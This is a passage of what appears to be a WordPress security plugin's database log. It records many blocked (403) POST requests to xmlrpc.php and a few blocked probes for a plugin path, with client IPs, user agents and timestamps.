Safari\\/537.36\"}','x4mtlH5KbY8pLCWkXoPFBeA7',0,1681642950.7550,791,'','POST',403,0,515,0,1,'',0),('81.21.253.29',1360395549,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','qlUP8m6nhsBwibGey5jTZgCV',0,1681642944.8502,577,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','v7dmOgykqMJY9E1NePiWFpTl',0,1681642922.7668,1438,'','POST',403,0,515,0,1,'',0),('193.200.99.82',3251135314,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','d45OGgCbsKxwRWDQSYfF7N1L',0,1681642929.5917,557,'','POST',403,0,515,0,1,'',0),('81.21.253.29',1360395549,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','t9NPnwrMyVRBaugz4jk0mHOi',0,1681647740.5742,584,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','MLPhq3ivDlJxckut7QXOKoaA',0,1681647727.8962,561,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','8SvVNwALBQ0mJ6yXWu5OcREn',0,1681647726.8127,560,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','5VYrlpyf0dQtx2MascEZSbTn',0,1681647721.3496,1393,'','POST',403,0,515,0,1,'',0),('137.184.59.110',2310552430,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','xRJKmrnuGefUDMEjZY5VahQT',0,1681647715.2882,1053,'','POST',403,0,515,0,1,'',0),('5.187.50.29',96154141,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','sZnNcAhU1g6Q40DVpe7tR9fG',0,1681647714.8725,991,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','Xk51mwDeg0OqaucR7KTLs3QS',0,1681647708.8666,586,'','POST',403,0,515,0,1,'',0),('5.23.51.23',85406487,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','fA509blpwoLuEBc8NyHm2JYs',0,1681647704.1234,4151,'','POST',403,0,515,0,1,'',0),('109.94.209.234',1834930666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','eSAnJWcXLO6Ygo0iT2rfsNGy',0,1681651924.3515,599,'','POST',403,0,515,0,1,'',0),('109.94.209.234',1834930666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','QyO4jrvDocbhPY5LTg7d8GIW',0,1681651923.5877,765,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','J9NpniISkKrojUCRMOs4tud3',0,1681651916.7525,573,'','POST',403,0,515,0,1,'',0),('142.132.251.120',2391079800,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','cKLJBvNrVna8lg9GCOyfdbP6',0,1681651914.7189,1319,'','POST',403,0,515,0,1,'',0),('213.152.161.85',3583549781,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YtkMXmwsIBacQVUSA30N4JGe',0,1681651677.2578,2717,'','POST',403,0,515,0,1,'',0),('85.10.148.169',1426756777,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','zjV26AoBYtlXqrHDv8iwNcmT',0,1681671216.2603,556,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','SZgjIw5d8MAl4ytDVfP0c1Ux',0,1681671206.5168,569,'','POST',403,0,515,0,1,'',0),('37.140.192.206',629981390,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','BxKJ2OqAUk47MWpZSjDn9P8z',0,1681671205.2478,642,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','YU3ymP9AXbuROjlIBcr5wegS',0,1681671195.4031,615,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','HSirQek5j7DJcEmK8wRn9UGA',0,1681671188.6872,595,'','POST',403,0,515,0,1,'',0),('189.126.122.183',3179182775,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','fUM1VgupjX5EBcLmxCDH6ZaN',0,1681671187.7662,582,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','fis0aBLtHMW4qUQx2CPobv3Y',0,1681671183.7225,549,'','POST',403,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','oAdXqvNmOucJ083QfbnIaEH4',0,1681671174.3668,1116,'','POST',403,0,515,0,1,'',0),('82.165.86.47',1386567215,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','DX6su2R57apI8nP1iBNbKo9G',0,1681671172.7200,2246,'','POST',403,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GQaoH5vblmncg041u9SOqLpW',0,1681666319.8042,3569,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','1uQMAwgDd2IGsYm4E3nrcFqT',0,1681665542.9870,545,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gl3OEuaofT6X0GkheQYKtz5y',0,1681665541.3109,561,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','cCtLWSGXHsEak4hB6zKmxI7g',0,1681665533.7704,1165,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','QH0IxwBahPf24KUSsrNcWovY',0,1681665533.4793,1261,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','m9LY0FqSdbGkTUNcjr86Khyw',0,1681665532.7387,548,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','73z6hiUYCxQIMW9VODlk4fgE',0,1681665529.6695,1209,'','POST',403,0,515,0,1,'',0),('139.59.25.27',2335906075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','n5TbPMws3DgEKUNGJua8SLI0',0,1681665526.1701,546,'','POST',403,0,515,0,1,'',0),('129.232.157.131',2179505539,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','MvbtX4Bc0xks3A2Lr5jS9nK7',0,1681665520.6680,549,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','5GjNLDSgxtoevKMC2lJykz7q',0,1681665518.4699,1433,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','paQyn0ZzwI9R2cvVrf8BULm4',0,1681665518.1667,1511,'','POST',403,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','3s7kZHeNa0p1PlqIC5ouvXiA',0,1681665517.6136,1350,'','POST',403,0,515,0,1,'',0),('89.163.145.59',1503891771,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','hxMH8KgeDu7lw9F5b2XVUyjv',0,1681665516.4152,548,'','POST',403,0,515,0,1,'',0),('213.152.187.195',3583556547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2w9qa0JxlrXK5z3LobfB8UNF',0,1681665514.5151,1033,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','m5y6uB8INM0l9gFdTiKp2ZRX',0,1681665509.2926,557,'','POST',403,0,515,0,1,'',0),('77.68.6.56',1296303672,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Ya2HpJOve9ludmDkLWyqbKoz',0,1681665508.5704,596,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','KEz6U1eAxfFc5tqdZmT7gPXb',0,1681665501.1611,582,'','POST',403,0,515,0,1,'',0),('162.0.229.50',2717967666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','BUhmPl1YAteGsFTW8cQDK5uq',0,1681665497.5652,570,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','ne2CE9lOIuUcxa1vMXrtk7bZ',0,1681665492.0667,573,'','POST',403,0,515,0,1,'',0),('62.151.182.173',1050130093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','vbTWEaRYGDMHqKZyVXdrh1uc',0,1681665489.2455,848,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','2P7gZ0XYMKIRVq9shxwASaL8',0,1681665488.6640,902,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','8mz6jN7XqEQoGseitl5n1xKk',0,1681665487.1655,1341,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','E2HeDskS3K9lhNyQzUWpZbPA',0,1681665483.6731,4375,'','POST',403,0,515,0,1,'',0),('104.254.90.235',1761499883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uJLAxZ0IhT1rFy8kbUod62cj',0,1681664381.8056,750,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','9gp6wGvZU3CIQKnhL57aWDTE',0,1681662617.2548,936,'','POST',403,0,515,0,1,'',0),('77.68.6.56',1296303672,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','4hckM5iHAKl0FqDQ3gOXCrmT',0,1681662615.9405,1737,'','POST',403,0,515,0,1,'',0),('173.231.231.50',2917656370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','eI9KqTk681OvXQB2YcVzprS4',0,1681662615.3629,2087,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','boXL0O1SKhJRiT4p2tBkNIFl',0,1681662604.1472,675,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','4ZQFrP98LpRzKCOjg5s0UmIv',0,1681662599.4617,3898,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','NBtCaWg3xjq4HvkZ6wDb9V1F',0,1681662589.0088,554,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','Oacz9o6JipDbxZqNAYTfHven',0,1681662586.9222,570,'','POST',403,0,515,0,1,'',0),('139.59.104.143',2335926415,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','aRNmKgIAVUkMXrQsTdvBo259',0,1681662574.2947,610,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','8KIJtu3Y7P4ZyBjaOldT9nwF',0,1681662571.0332,571,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','dyha2bcOzRpmQFsLYD90UfC5',0,1681662563.0504,754,'','POST',403,0,515,0,1,'',0),('68.178.149.158',1152554398,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qnrvwEoK6cJ7z80VhuW4TMk3',0,1681662559.2801,3883,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Ketsp74P6XCjUcwDNzB31iyq',0,1681662558.5350,3648,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','6BVIg3paEjRwKbirGDOHd2ZJ',0,1681661016.2383,608,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','5w2acpGoP6yrizfgsW9EjSVn',0,1681661015.5231,556,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','O3fDFygX2qMJ8USazRhHVeYL',0,1681661008.9543,2591,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','dAb9aBKWiC3lkD2Oj1QJPs0L',0,1681661008.0429,3239,'','POST',403,0,515,0,1,'',0),('165.22.211.204',2769736652,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','pDqf3AaYBhExz1Ho9jnXIG0Z',0,1681661007.9429,3122,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','RzLIQSw2FPJADhiql1K3BjZc',0,1681660999.4654,1058,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','AwmC6GaW9gZn4uBkQp0Ne2Ej',0,1681660999.0295,1121,'','POST',403,0,515,0,1,'',0),('185.141.215.15',3113080591,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','okTrZnHIu6qfwBgVmlibPMSx',0,1681660996.7334,558,'','POST',403,0,515,0,1,'',0),('193.200.99.82',3251135314,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','W9kDdJziKcL2oEBFPZ0HmSxa',0,1681660993.1040,548,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','tF0khqIdXMrEK7S6RvOpcBma',0,1681660991.4211,630,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','MaTXBipHAuQsFqCNvbtfjknd',0,1681660983.2254,555,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','rZiP0M3JDtl6agomUjReCksL',0,1681660982.0131,575,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','LcOEFG6peTxabgJ7M9t3YKVi',0,1681660979.2509,731,'','POST',403,0,515,0,1,'',0),('217.151.98.168',3650577064,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qEfBLltcryns5VDxZdkN0PWY',0,1681670716.0393,3814,'','POST',403,0,515,0,1,'',0),('51.222.44.188',870198460,'','http://cmdev-site1.com/blog/wp-content/plugins/task-controller/index.php','','{\"1\":\"Linux Mozilla\"}','CxyOzLRBVDQA0rHsWX1T7qN8',0,1681670232.8141,268,'','GET',403,0,700,0,1,'',0),('51.222.44.188',870198460,'','http://cmdev-site1.com/wordpress/wp-content/plugins/task-controller/index.php','','{\"1\":\"Linux Mozilla\"}','tsv3XVyL86PcISDl5H1YCw2F',0,1681670230.9549,399,'','GET',403,0,700,0,1,'',0),('51.222.44.188',870198460,'','http://cmdev-site1.com/wp/wp-content/plugins/task-controller/index.php','','{\"1\":\"Linux Mozilla\"}','B8TmfAWolDbXijIh7KJwuVYn',0,1681670232.1770,274,'','GET',403,0,700,0,1,'',0),('51.222.44.188',870198460,'','http://cmdev-site1.com/wp-content/plugins/task-controller/index.php','','{\"1\":\"Linux Mozilla\"}','9QA0Lbs8ejlYgKa4HUVtSNiO',0,1681670228.5061,1865,'','GET',403,0,700,0,1,'',0),('104.254.90.187',1761499835,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','b4TMkjd9SYocnsgL5CRa3rEZ',0,1681668535.9858,4309,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','eGWZyT54Fqm9xsjuPpiXdVNC',0,1681683071.5718,1621,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','0QVmh4OwTPiJsZakKHfxSogI',0,1681683071.3613,1892,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 